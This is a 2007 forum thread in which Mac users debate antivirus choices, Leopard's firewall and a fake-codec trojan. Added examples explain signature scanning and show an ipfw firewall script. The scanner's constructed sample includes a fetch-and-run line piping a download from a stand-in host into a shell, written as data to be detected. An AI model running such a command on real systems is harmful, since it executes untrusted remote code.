Antivirus....Which One?

vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Fri Nov 09, 2007 2:03 am Post

Cognisant as I am of Apple's inexorable slide or drift towards that day of reckoning, when some hack at Macworld informs the world that there are now as many nasty little pieces of Mac-specific malware out there as there are those aimed at MS et al; and given the sudden proliferation of Slavic-featured gentlemen purchasing property in my local, allied to the iffy performance of my beautiful little, sexy-as-hell iMac, inclining me to wonder if the Russian Mafia haven't already established a bridgehead on the iMac's hard drive; I was wondering what protection, if anything, other members of Scrivener's crew use (and do me a favour! I'm not talking safe sex. Let's all see if we can rise above the juvenile, eh? (Not for ever, mind)).

I'm inclined towards Sophos or Intego, but I would really appreciate having the benefit of knowing what Scriv's crew think on this particular topic.

In anticipation, thanks.
Take care
Vic
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.

dafu
Posts: 567
Joined: Tue Jan 30, 2007 1:33 am
Platform: Mac
Location: Chicago

Fri Nov 09, 2007 2:56 am Post

Sophos is excellent, Vic.


Dave

Siren
Posts: 759
Joined: Mon Mar 12, 2007 11:29 am
Platform: Mac + iOS
Location: U.K.

Fri Nov 09, 2007 9:11 am Post

How can you tell if an anti-virus security package is any good if there aren't any viruses for it to detect? I'm not being facetious; I genuinely would like to know, because I have been thinking about anti-virus software for the past five years and have never taken the plunge because I couldn't decide what to get.

antony
Posts: 905
Joined: Thu Mar 29, 2007 7:50 pm
Location: England

Fri Nov 09, 2007 9:59 am Post

vic-k wrote: that day of reckoning, when some hack at Macworld informs the World that: There are now as many nasty little pieces of Mac-specific malware out there, as there are those aimed at MS et al


That will never happen, and you can quote me on that in five years' time if you like ;)

If you are concerned, though, as Dave says Sophos is one of the more reputable companies out there. There's also ClamXav, a freeware app based on the open-source ClamAV antivirus engine for Unix, though it hasn't yet been fully updated for Leopard.

[EDIT TO ADD: Basically, just avoid Norton/Symantec like the plague...]
Antony Johnston
antonyjohnston.com
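Siren asks above how you can tell whether a scanner is any good when there is nothing for it to catch, and antony points at ClamXav, which wraps the ClamAV engine. The practical answer to Siren's question is the EICAR test file, a harmless standard string that every reputable engine ships a signature for precisely so that an install can be checked. What follows is an added example, not code from this thread and not ClamAV's own code, showing the mechanism behind such a "detection": a scanner that loads ClamAV's two plain-text signature formats (.hdb whole-file hash lines of the form MD5:FileSize:Name, and .ndb body-pattern lines of the form Name:TargetType:Offset:HexSignature, where ?? is a one-byte wildcard and an offset of * means "anywhere") and runs them over some byte strings. The formats are ClamAV's; the signature names, the hex patterns and the four sample "files" are constructed for the example and are scanned from memory, so nothing is written to disk.

```python
import hashlib
import re

# Constructed signature database in ClamAV's plain-text formats (the formats are
# ClamAV's; these particular signatures are made up for this example).
#   .ndb line: MalwareName:TargetType:Offset:HexSig   (?? = any byte,
#              Offset '*' = anywhere, otherwise an absolute byte offset)
SAMPLE_NDB = """\
Example.Codec-Dropper:0:*:4558414d504c452d434f4445432d44524f50504552
Example.MachO-Wild:0:0:cffaedfe??000001
"""

# Constructed sample "files" (not real malware), scanned from memory.
SAMPLE_CLEAN = b"Chapter one. It was a dark and stormy night.\n"
SAMPLE_DROPPER = (b"#!/bin/sh\n# EXAMPLE-CODEC-DROPPER\n"
                  b"curl http://example.invalid/payload | sh\n")
SAMPLE_MACHO = b"\xcf\xfa\xed\xfe\x07\x00\x00\x01" + b"\x03\x00\x00\x00" * 4
SAMPLE_HASHED = b"PK\x03\x04constructed archive bytes with no body pattern\n"

#   .hdb line: MD5:FileSize:MalwareName   (whole-file hash match)
# Derived from the sample above so the example stays self-contained.
SAMPLE_HDB = "%s:%d:Example.Hash-Only\n" % (
    hashlib.md5(SAMPLE_HASHED).hexdigest(), len(SAMPLE_HASHED))


def parse_hdb(text):
    """Return [(md5_hex, size, name)] from .hdb lines; blanks and # comments skipped."""
    sigs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        md5_hex, size, name = line.split(":", 2)
        sigs.append((md5_hex.lower(), int(size), name))
    return sigs


def hexsig_to_regex(hexsig):
    """Turn a hex signature with ?? wildcards into a compiled bytes regex."""
    if len(hexsig) % 2:
        raise ValueError("odd-length hex signature: %r" % hexsig)
    parts = []
    for i in range(0, len(hexsig), 2):
        pair = hexsig[i:i + 2]
        parts.append(b"." if pair == "??" else re.escape(bytes([int(pair, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)  # DOTALL: ?? must match 0x0a too


def parse_ndb(text):
    """Return [(name, offset_or_None, regex)] from .ndb lines."""
    sigs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _target, offset, hexsig = line.split(":", 3)
        sigs.append((name, None if offset == "*" else int(offset),
                     hexsig_to_regex(hexsig)))
    return sigs


def scan_bytes(data, hdb_sigs, ndb_sigs):
    """Return the names of every signature matching `data` (empty list = clean)."""
    hits = []
    # Real engines check the size first and only hash when a signature of that
    # length exists; one digest up front is enough for an example.
    digest = hashlib.md5(data).hexdigest()
    for md5_hex, size, name in hdb_sigs:
        if size == len(data) and md5_hex == digest:
            hits.append(name)
    for name, offset, regex in ndb_sigs:
        if offset is None:
            if regex.search(data):
                hits.append(name)
        elif regex.match(data, offset):  # anchored at the signature's offset
            hits.append(name)
    return hits


HDB_SIGS = parse_hdb(SAMPLE_HDB)
NDB_SIGS = parse_ndb(SAMPLE_NDB)


def scan(data):
    return scan_bytes(data, HDB_SIGS, NDB_SIGS)


if __name__ == "__main__":
    for label, blob in (("clean", SAMPLE_CLEAN), ("dropper", SAMPLE_DROPPER),
                        ("macho", SAMPLE_MACHO), ("hashed", SAMPLE_HASHED)):
        print("%-8s %s" % (label, scan(blob) or "OK"))
```

The point for Siren's question is that "detection" is nothing more mysterious than this: a scanner is only as good as the signature list it carries and how quickly that list is updated, which is why the vendor's update record matters more than any feature list. A hash signature is defeated by changing a single byte, which is why engines also carry byte-pattern signatures with wildcards, and why even those are a lagging indicator against a trojan that is repackaged for every download.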

vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Fri Nov 09, 2007 10:20 am Post

Thanks for your response Dave.

Siren,
As I understand it, to date there have been (I think) three pieces of nasty stuff written specifically with the Mac OS in mind; could be more by now. The only reason there aren't that many yet is simply that nobody has bothered to write them. But they will.

Unprotected Macs can play 'host' to viruses aimed at other OSs. We can infect anyone we interact with.

After I posted my request last night, I had a quick glance at the Guardian before I went to bed, and lo and behold, in its IT supplement there is an article under 'Newly Asked Questions' about Leopard being so full of security problems; it's worth reading if you are upgrading. I'll see if I can find a link on the Guardian website when I've posted this.

I'll get right back with the link,

Vic

antony, I've just seen your post, thanks. The sentiments expressed about Mac viruses belong to one of two polarised schools of thought that are as contentious as the Mac vs Wintel debate.

I'd like to think that it could never happen, but when you consider the intellectual prowess of some of the people in Scriv' forums alone, I think it's odds-on it's gonna happen.

There's an even greater threat, for me, than the Russian Mafia getting at my hard drive: my in-laws could get at it. That's something we all should fear :cry:

Vic
Last edited by vic-k on Fri Nov 09, 2007 10:52 am, edited 3 times in total.
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.

crimewriter
Posts: 119
Joined: Thu Mar 22, 2007 11:47 am
Location: Cotswolds

Fri Nov 09, 2007 10:34 am Post

Like you, Vic, I started to feel uneasy about my unprotected Mac and took a look at the antivirus stuff out there a week or so ago. Sophos, I thought, was aimed at the business community. I downloaded a trial of Intego, found it quick and easy to set up and operate, so paid for a licence two hours later.

As far as I can tell, it just sits there and gets on with its job without interrupting my work.

It's expensive, though, IMHO-- about £45 for a year's subscription. But with that, and my automatic remote daily backup, I worry less about losing work.

Cheers.
cw
Some quiet night when you've shirked your work because of fatigue or distraction, open a window of your house and listen. Do you hear that distant clicking sound? That's one of your competitors, pecking away at his keyboard in Paris or London or Erie, PA

vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Fri Nov 09, 2007 11:12 am Post

cw,
Thanks for your response, appreciate it :wink:
Here's the Guardian article I mentioned:

[Start Article]
Newly asked questions
Is Apple's Leopard less secure than its predecessor, Tiger?
Kate Bevan
The Guardian
Thursday November 8 2007
In some ways yes, in others no. The latest big cat flavour of OS X, unleashed last month, was quickly poked and prodded by security experts keen to explore any weakness they could find (since the headline "weakness in OSX!" is a surefire reader magnet). They found lots: first, the firewall is turned off by default (as it has been on previous versions), and when turned on will still allow all connections - about as useful as a chocolate fireguard. Next, notes Heise Security, it doesn't distinguish between trusted networks and potentially dodgy ones - unlike (gasp!) Windows Vista (tinyurl.com/39bjq5). Then, you can only deny connections by application, not by service or by port - which you could in Tiger and which you really ought to be able to do. Nor can you block outbound services - and it's those that are usually a problem with exploits. The review identifies other issues to do with Apple not using the most up-to-date versions of various protocols. The gist is clear: security wonks aren't happy.

Next is the new Back To My Mac service, which lets .Mac subscribers access their Macs via .Mac from any other machine running Leopard. One click connects directly to it, without any other password. So someone who gets your .Mac account login gets your machine too, for free. "Do not go back to my Mac," warn the Open Door team (tinyurl.com/yo39gk).

A closer examination by Matasano Security (at tinyurl.com/yqt3pl) also points to weaknesses in the one-time "guest" account and even in the new "address randomisation" feature, which should make some attacks (notably buffer overflows, a common remote exploit) more difficult. Overall, it's cold comfort - especially for those whose mums have accessed their porn stash via Back To My Mac. [End Article]

I'll leave you all to make your own assessment of its content, as I'm not competent to critique it :?

Take care
Vic
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.

Tacitus
Posts: 214
Joined: Sun Jun 17, 2007 10:33 am
Platform: Mac
Location: UK

Fri Nov 09, 2007 12:31 pm Post

Personally I wouldn't bother with AV. One day there may be something to get worried about but until then I'll pass. That said, from talking to those more paranoid than me, Intego is the one that gives the least trouble. Not cheap but I think the renewal costs are rather less - some £25. Norton/Symantec should be avoided at all costs.

I thought Sophos was only available to Corporates.....

The most likely Mac exploit is not a virus but a trojan. There's one currently doing the rounds posing as a QuickTime codec. Needless to say the anti-Mac brigade are touting this as proof that Macs are 'just as susceptible to viruses as Windows', ignoring the fact that it's a trojan NOT a virus. To get it you have to:

a) visit a specific porn site, although no doubt there will be others,
b) download the package when asked
c) open the package
d) supply your admin name and password when it asks, something you should never do for an unknown/untrusted package.

The installed rootkit will then phone home with your bank details and whatever else it can gather.

Apart from using common sense there is not a lot you can do to guard against this sort of exploit.
History is a nightmare from which I am trying to escape

antony
Posts: 905
Joined: Thu Mar 29, 2007 7:50 pm
Location: England

Fri Nov 09, 2007 4:33 pm Post

Sorry, Vic, but that Grauniad article is just repeating stuff from blogs, some of them very alarmist, and half of them debunked since they were published. No doubt that Leopard has a few bugs, but security isn't one of them - the firewall is entirely different to older versions, and behaves accordingly. There have been several more in-depth examinations of it since those articles appeared.

As for my initial "that will never happen" line, it was directly in response to the idea that one day there'll be as many virii for OSX as there are for Windows. Which really isn't going to happen, owing to their very different histories and design philosophies.

The only reason there aren`t that many yet, is simply that nobody has bothered to write them. But, they will.


Absolutely not true. The prestige, praise and reward that would be heaped upon the first hacker to successfully write a true virus for OSX is enormous. The oft-spread FUD that OSX is only secure because of its small market share is rubbish.

Now, does that mean there will never be virii on OSX? Of course not. Nothing is impossible. But the likelihood of a successful, damaging, self-propagating OSX virus remains extremely small. And there certainly aren't any about at the moment.

(The trojan that Tacitus points out is just that, a trojan, which relies on social engineering - i.e. the naivety of the user - to succeed. Anyone who downloads a 'special video codec' from a porn site and then authorises it to run with their administrator password... well, they probably shouldn't have an administrator password ;) )
Antony Johnston
antonyjohnston.com

Tacitus
Posts: 214
Joined: Sun Jun 17, 2007 10:33 am
Platform: Mac
Location: UK

Fri Nov 09, 2007 5:27 pm Post

antony wrote: ... the firewall is entirely different to older versions, and behaves accordingly. There have been several more in-depth examinations of it since those articles appeared ...

For those who like tinkering, "getting under the hood" as our American cousins have it, you can disable the new firewall and play with the Unix ipfw firewall which is still there.

Alternatively you can use Intego's Net Barrier. Amongst the other stuff is WaterRoof (free), Flying Buttress and DoorStop (both paid for). I don't use any of them, but I think the latter simply supply a GUI for the Unix stuff.

I'm not yet on Leopard as I generally wait until the .3 release before I move. Let others have the grief :-)
History is a nightmare from which I am trying to escape
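Tacitus notes that the Unix ipfw firewall is still there underneath Leopard's new application firewall, and the Guardian piece quoted earlier complained that the application firewall can neither filter by port nor block outbound services. Below is an added example, not from this thread and not from any of the tools Tacitus names, of a small stateful ipfw rule set that does both: new inbound TCP connections are refused except on listed ports, and a listed outbound port is refused even though everything else outbound is allowed. The rule syntax is ipfw's; the port choices (accept inbound ssh on 22, refuse outbound SMTP on 25) are assumptions for illustration. Rule order is the whole point with ipfw, which stops at the first matching rule, so the outbound deny sits in front of the general outbound allow. Without --apply the script only prints the rules for review; applying them requires root on a machine that actually has ipfw.

```sh
#!/bin/sh
# Added example: a small stateful ipfw policy for a single-user Mac (ipfw2
# syntax as shipped with Leopard-era OS X). The ports are assumptions chosen
# for illustration, not anything from the thread.

# Inbound TCP ports on which new connections are accepted (assumption: ssh only).
ALLOW_IN_TCP="22"
# Outbound TCP ports refused even though other outbound traffic is allowed
# (assumption: block direct SMTP so a trojan cannot spam straight from the box).
DENY_OUT_TCP="25"

# Emit the rule set, one "add ..." line per rule, in evaluation order.
ipfw_rules() {
    echo "add 100 allow ip from any to any via lo0"          # loopback is always fine
    echo "add 200 check-state"                              # replies to our own sessions
    for p in $DENY_OUT_TCP; do                              # outbound deny BEFORE the allow
        echo "add 300 deny log tcp from me to any $p out"
    done
    echo "add 400 allow tcp from me to any out setup keep-state"
    echo "add 410 allow udp from me to any out keep-state"
    echo "add 420 allow icmp from any to any icmptypes 0,3,8,11"
    for p in $ALLOW_IN_TCP; do                              # the only inbound doors
        echo "add 500 allow tcp from any to me $p in setup keep-state"
    done
    echo "add 600 deny log tcp from any to any in setup"   # any other new inbound TCP
    echo "add 610 deny log udp from any to any in"
    echo "add 65000 deny log ip from any to any"           # explicit default deny
}

# Number of rules the policy produces (used for a sanity check).
rule_count() { ipfw_rules | wc -l | tr -d ' '; }

if [ "${1:-}" = "--apply" ]; then
    # Must run as root on a system that has ipfw; "deny log" only logs once
    # net.inet.ip.fw.verbose is set to 1 with sysctl.
    ipfw -f flush
    ipfw_rules | while read -r rule; do ipfw $rule; done
    ipfw list
else
    ipfw_rules
fi
```

Use `sudo sh thisfile.sh --apply` to load it and `sudo ipfw list` to see what took effect; because the script flushes the table first, keep an ssh-free way back to the machine the first time you try it. Note that this is a packet filter, so unlike the application firewall it neither knows nor cares which program opened the socket; the two approaches answer different questions and can be used together.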

vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Fri Nov 09, 2007 8:26 pm Post

antony,
Thanks for your responses.
My iterations are the product of 'Everyman's Entitlement to a Working Misconception of Anything and Everything', and as a consequence may 'appear' to be embracing a naive and somewhat alarmist approach to the subject. That's not the case.

I endorse the sentiments expressed in the adage, "Better Safe Than Sorry."
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.

kewms
Posts: 7439
Joined: Fri Feb 02, 2007 5:22 pm
Platform: Mac

Fri Nov 09, 2007 10:35 pm Post

No matter whether they're written by some kid with too much time on his hands, the <insert country here> Mafia, or international terrorists, virii are just software. Sneaky, malicious software, but software nonetheless. They have to use whatever mechanisms the operating system provides to transmit, install, and run themselves.

Windows (and MS-DOS) was originally designed for standalone, non-networked, PCs. For those computers, the only way software could get onto a system was if the user put it there. Many users consider it rude if the operating system gets in the way, so Windows got out of the way and let the user do pretty much whatever he wanted. However misguided that might be. When the new networked world full of bad actors dawned, Windows was woefully unprepared and has basically been closing holes ever since.

Unix, in contrast, was designed from the very beginning for networked, multiuser environments. In those environments, you can't assume that the user knows what he is doing, and even if he does, you still can't just allow him to blunder through everyone else's data. Unix computers were also among the first to be subject to cracker attacks, for the simple reason that for a long time they were the only computers that had both network connections and information worth stealing. Thus, Unix systems draw a sharp distinction between user-level privileges and admin-level privileges. Most tasks run with user privileges, which among other things keep the task from poking its little electronic nose where it doesn't belong. I'll spare you the detailed technical explanation, but most unpleasant virus behavior requires admin privileges, and under Unix (or OS X) it's difficult for a task to get admin privileges unless a human user explicitly gives them to it.

That's where social engineering comes in, and social engineering attacks will work on ANY computer. If a piece of software can deceive the human user, it can get permission to do whatever the human himself can do. That's why on really secure systems, only a few humans have admin-level access. Joe the clueless accounting temp can't give away data that he doesn't have.

Anyway, the biggest difference between Unix (and OS X, which is Unix underneath) and Windows (pre-Vista) is that admin access is not automatic, for either humans or software. It requires not only confirmation (click a dialog box), but authentication (enter a password). That's a much higher barrier for malicious code.

No, that does not mean that OS X is an impenetrable security fortress. But it does mean that the number of ways in is far more limited, and therefore the watchers, human or electronic, have much less to worry about. Even as the number of attackers increases -- which it will, with growing market share -- that structural advantage will remain. And of course the Mac-focused security resources will also increase as market share grows.

(Windows Vista bragged about improved security. I don't know enough to comment on that.)

Katherine

kewms
Posts: 7439
Joined: Fri Feb 02, 2007 5:22 pm
Platform: Mac

Fri Nov 09, 2007 10:43 pm Post

antony wrote: Absolutely not true. The prestige, praise and reward that would be heaped upon the first hacker to successfully write a true virus for OSX is enormous. The oft-spread FUD that OSX is only secure because of its small market share is rubbish.


Yes and no. It's true that OS X is a prestige target that probably gets plenty of attention. However, the small market share would limit the spread of any OS X virus as it could only propagate itself to other OS X systems. That makes OS X a much less lucrative target for people attempting to harvest private information, build botnets, and so forth. Prestige-motivated crackers may be interested in OS X, but the hypothetical organized crime baddies are economically motivated and may not see it as a good investment.

Katherine

bhpascal
Posts: 42
Joined: Tue Nov 14, 2006 12:24 am

Fri Nov 09, 2007 10:50 pm Post

It's not about the relative number of malicious folks, it's about the underlying operating system. OS X, like any good (Unix, Linux, BSD)-based OS, actually has a sane system of users and administrators. Windows XP basically refused to run if you weren't operating as an administrator. OS X, even in accounts WITH administrator access, times out your Kerberos keys (basically the permission from the OS to do high-level things) fairly quickly, so ANY sort of deep system modification requires inputting a password.

I can't even write a file to the main directory of my hard drive without putting in a password. I can manipulate things inside my home directory with reckless abandon, but the actual software that runs the operating system resides elsewhere and lives independent of my wacky little preference files.

THAT is why, as yet, I'm not burning up the RAM for an antivirus program. The only Mac trojan that's been publicized recently posed as a video codec. You'd download it, install it, and it would ask for a password. As a general rule, if you never type in a password without knowing FOR SURE from whence the program came, the odds of your computer catching anything are vanishingly small.

vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Sat Nov 10, 2007 12:22 am Post

Katherine, antony, Tacitus and bhpascal,
A very big, sincere thank you for the time and effort you've all put in, in order to penetrate that which lies beneath my 'Everyman's' cap.

I must have inadvertently given you all my admin's password, because not only have you managed to install a Trojan Horse on my cranial hard drive, there is also a Spanish Galleon and a Viking longboat (all crewed, of course).

If I may ask for your views on: (a) OS X hosting non-Mac malware; (b) the impact on OS X security of Apple's big-time incursion into Wintelland with the adoption of Intel processors, Parallels and Boot Camp. I see that as a big incentive for MS Windows users to jump ship and still retain the best of both worlds (MS must do something right).

Of course the dirty great whacking thank you extends to all who've taken the trouble to share their views on this topic. I would of course appreciate all your contributions to the Wintel question as well.

It's 12:45am and Jameson is tapping me on the shoulder, so I'll wish you all good night, and thanks a trillion.
Take care
vic
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.